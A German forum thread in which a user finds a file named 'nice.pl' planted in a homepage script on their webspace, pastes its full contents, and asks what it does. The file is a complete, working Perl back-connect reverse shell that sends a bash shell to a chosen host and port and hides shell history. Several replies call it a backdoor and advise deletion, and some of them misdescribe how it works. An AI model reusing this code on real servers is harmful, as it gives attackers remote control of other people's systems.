[Q]- [KOMISCHE DATEI IN HP SCRIPT]

10/21/2011 02:49 ☆τяəyΖ™☆#1
Hey Leuts,

Wollte heute mein Hp Script auf mein Webspace hochladen und habe es auch getan, vor etw. 5 Minuten wollte ich die Home Seite bearbeiten...

Dabei sah ich eine Datei namens
"nice.pl" ohne "

in dieser befand / befindet sich folgendes :

Quote:
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
Was hat das zu bedeuten oder was macht das script ??

Ist es gefährlich oder soo :o ?
10/21/2011 02:51 xyNN.##2
print "IHS BACK-CONNECT BACKDOOR\n\n"; ... denk schon xD
10/21/2011 02:57 ☆τяəyΖ™☆#3
Was heißt denk schon ????

Ist gefährlich und rauslöschen

oder ungefährlich

ohr what ??
WTF WAS DES :D ?!
10/21/2011 03:04 .Kay331#4
Also ich würde die mal schnell wieder vom Webspace nehmen :D kenne mich ja nicht gut aus aber das sieht mehr als komisch aus und da kommt dieses nicht schöne Wort backdoor vor ;)

Sieht so aus als wäre es ne Lücke im Script
10/21/2011 03:12 ☆τяəyΖ™☆#5
okay habs mal rausgelöscht, danke für eure hilfe.
10/21/2011 11:26 ι¢н☆#6
Ist nen Perl Script,dass dem Hacker deine Root Daten sendet.
10/21/2011 11:26 nostradame37#7
ist ein bagdor zwar ein komisches aber
deleteeeeeeeeeen
10/21/2011 12:51 LordMampf2#8
Hallo =)

Also des Script ließt Informationen übers System aus und auch Zugangsdaten..
-> andere HP verwenden!

grüßle LordMampf2
10/21/2011 12:55 ThinSmoke#9
Ihr habt ja alle so eine Ahnung,

das ist ein Root-Backdoor welcher via Netcat eine Verbindung zu einem 3. Ziel Rechner aufbaut. Über diese sogenannte Shell (Netcat) hat der Angreifer dann die Chance an sämtliche empfindliche Daten zu gelangen.

Es musst lediglich das Perl Script ausgeführt werden mit einer IP auf die er Verbinden soll mit Port.

Solange das Script nur auf dem Webspace liegt ungefährlich sobald es ausgeführt wird, sehr gefährlich.

Einfach htaccess.log durchforsten wer es ausgeführt hat und fertig.